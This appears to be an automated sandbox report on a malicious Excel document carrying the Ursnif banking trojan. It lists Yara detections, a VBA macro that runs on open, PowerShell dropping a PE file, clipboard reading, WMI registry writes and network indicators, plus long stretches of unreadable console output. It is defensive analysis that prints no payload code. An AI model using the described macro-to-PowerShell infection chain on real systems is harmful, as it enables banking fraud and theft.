Source: explorer.exe, 0000001E.00000000.2607897010.02A60000.00000004.00000001.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/firefox/new
Source: explorer.exe, 0000001E.00000000.2609903529.03950000.00000004.00000001.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/firefox/new/?scene=2
Source: explorer.exe, 0000001E.00000000.2609903529.03950000.00000004.00000001.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/firefox/new/?scene=2v

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49233
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49220
Source: unknown	Network traffic detected: HTTP traffic on port 49232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49233 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000E.00000002.2640661969.029B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2525298573.0259C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2517600435.02798000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2248, type: MEMORY

Contains functionality for read data from the clipboard

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 8_2_0045593F CreateEventA,StrChrW,WaitForSingleObject,OpenClipboard,GetClipboardData,CloseClipboard,CloseHandle,GetCurrentProcessId,wsprintfW,OpenFileMappingW,MapViewOfFile,CloseHandle,

8_2_0045593F

Contains functionality to read the clipboard data

Show sources

Source: C:\Windows\System32\rundll32.exe

8_2_0045593F

Creates a window with clipboard capturing capabilities

Show sources

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000E.00000002.2640661969.029B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2525298573.0259C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2517600435.02798000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2248, type: MEMORY

Drops certificate files (DER)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Jump to dropped file

System Summary:

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\W

Jump to dropped file

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 4452
Source: unknown	Process created: Commandline size = 4415
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: Commandline size = 4452	Jump to behavior

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\System32\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\System32\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\System32\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\System32\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\System32\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\System32\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Source: C:\Windows\System32\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue

Contains functionality to call native functions

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 8_2_0045309E NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,

8_2_0045309E

Detected potential crypto function

Show sources

Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_00454A81		8_2_00454A81
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_0045A190		8_2_0045A190

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: MIL0001742828.xls	OLE, VBA macro line: Private Sub Notifica_Layout()
Source: VBA code instrumentation	OLE, VBA macro: Module Foglio1, Function Notifica_Layout			Name: Notifica_Layout

Document contains embedded VBA macros

Show sources

Source: MIL0001742828.xls

OLE indicator, VBA macros: true

PE file does not import any functions

Show sources

Source: ygdsonvv.dll.23.dr

Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Show sources

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Yara signature match

Show sources

Source: 00000002.00000003.2070939440.000CF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000003.2072821354.000DC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.2073703270.00070000.00000004.00000020.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.2073869879.00270000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.2073914205.011BD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.2073902999.004B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.2073755839.000DD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000003.2072909615.014E2000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Classification label

Show sources

Source: classification engine

Classification label: mal100.bank.troj.expl.evad.winXLS@37/56@16/4

Contains functionality to instantiate COM classes

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 8_2_004556C7 CoCreateInstance,ObjectStublessClient9,IUnknown_QueryService,IUnknown_QueryService,ObjectStublessClient9,

8_2_004556C7

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT

Jump to behavior

Creates mutexes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1CE5CAFC-CBBD-AE78-3510-2FC23944D316}

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user~1\AppData\Local\Temp\CVRA72D.tmp

Jump to behavior

Document contains an OLE Workbook stream indicating a Microsoft Excel file

Show sources

Source: MIL0001742828.xls

OLE indicator, Workbook stream: true

Found command line output

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........3Jnp...#........3Jn.....=2.L\|In......ak 'On..aks{..L\|InH............7Jn......In.=2...D............. 'On..In....	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................#.....D.\......w...................w..0.....l...t...8.......................#...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x......./.....D........wx..................w..0.....l...t...8...G.................../...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................/.....D.\......w...................w..0.....l...t...8...b.................../...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......;.....D........wx..................w..0.....l...t...8.......................;...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................;.....D.\......w...................w..0.....l...t...8.......................;...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......G...A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.3.2.7...l...t...8.......................G.......X...&...>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................G.....D.\......w...................w..0.....l...t...8.......................G...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......S.....D........wx..................w..0.....l...t...8.......................S...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................S.....D.\......w...................w..0.....l...t...8...4...................S...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x......._.....D........wx..................w..0.....l...t...8...\..................._...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................_.....D.\......w...................w..0.....l...t...8...w..................._...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......k.....D........wx..................w..0.....l...t...8.......................k...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................k.....D.\......w...................w..0.....l...t...8.......................k...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......w.....D........wx..................w..0.....l...t...8.......................w...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................w.....D.\......w...................w..0.....l...t...8.......................w...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8...%...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8...@...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8...j...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8...3...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8...N...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8...v...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8...@...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8...[...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8...%...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8...M...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8...h...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......+.....D........wx..................w..0.....l...t...8.......................+...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................+.....D.\......w...................w..0.....l...t...8.......................+...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......7.....D........wx..................w..0.....l...t...8.......................7...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................7.....D.\......w...................w..0.....l...t...8...2...................7...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......C.....D........wx..................w..0.....l...t...8...Z...................C...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................C.....D.\......w...................w..0.....l...t...8...u...................C...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......O.....D........wx..................w..0.....l...t...8.......................O...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................O.....D.\......w...................w..0.....l...t...8.......................O...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......[.....D........wx..................w..0.....l...t...8.......................[...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................[.....D.\......w...................w..0.....l...t...8.......................[...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......g.....D........wx..................w..0.....l...t...8...,...................g...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................g.....D.\......w...................w..0.....l...t...8...G...................g...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......s.....D........wx..................w..0.....l...t...8...o...................s...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................s.....D.\......w...................w..0.....l...t...8.......................s...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8...F...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8...a...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8...*...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8...R...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8...m...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8...7...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8..._...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8...z...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8...(...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8...C...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......'.....D........wx..................w..0.....l...t...8...k...................'...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................'.....D.\......w...................w..0.....l...t...8.......................'...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......3.....D........wx..................w..0.....l...t...8.......................3...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................3.....D.\......w...................w..0.....l...t...8.......................3...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......?.....D........wx..................w..0.....l...t...8.......................?...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................?.....D.\......w...................w..0.....l...t...8.......................?...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......K.....D........wx..................w..0.....l...t...8...?...................K...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................K.....D.\......w...................w..0.....l...t...8...Z...................K...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......W.....D........wx..................w..0.....l...t...8.......................W...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................W.....D.\......w...................w..0.....l...t...8.......................W...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......c.....D........wx..................w..0.....l...t...8.......................c...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................c.....D.\......w...................w..0.....l...t...8.......................c...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......o.....D........wx..................w..0.....l...t...8.......................o...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................o.....D.\......w...................w..0.....l...t...8...#...................o...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......{.....D........wx..................w..0.....l...t...8...K...................{...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................{.....D.\......w...................w..0.....l...t...8...f...................{...............>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.../...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8...W...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8...r...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8... ...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8...;...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8...e...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x........... .'.t.'.,.'.o.n.'.,.'.V.i.t.'.)...0.....l...t...8...1...........................X... ...>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8...L...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8...t...................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.............D........wx..................w..0.....l...t...8...................................f...>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................D.\......w...................w..0.....l...t...8.......................................>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......#... .D........wx..................w..0.....l...t...8.......................#.......X.......>..w........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................#.....D.\......w...................w..0.....l...t...8.......................#...............>..w........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.................V+.........................._...........!...@@ ...&.u.....&.....\....F%J......&.
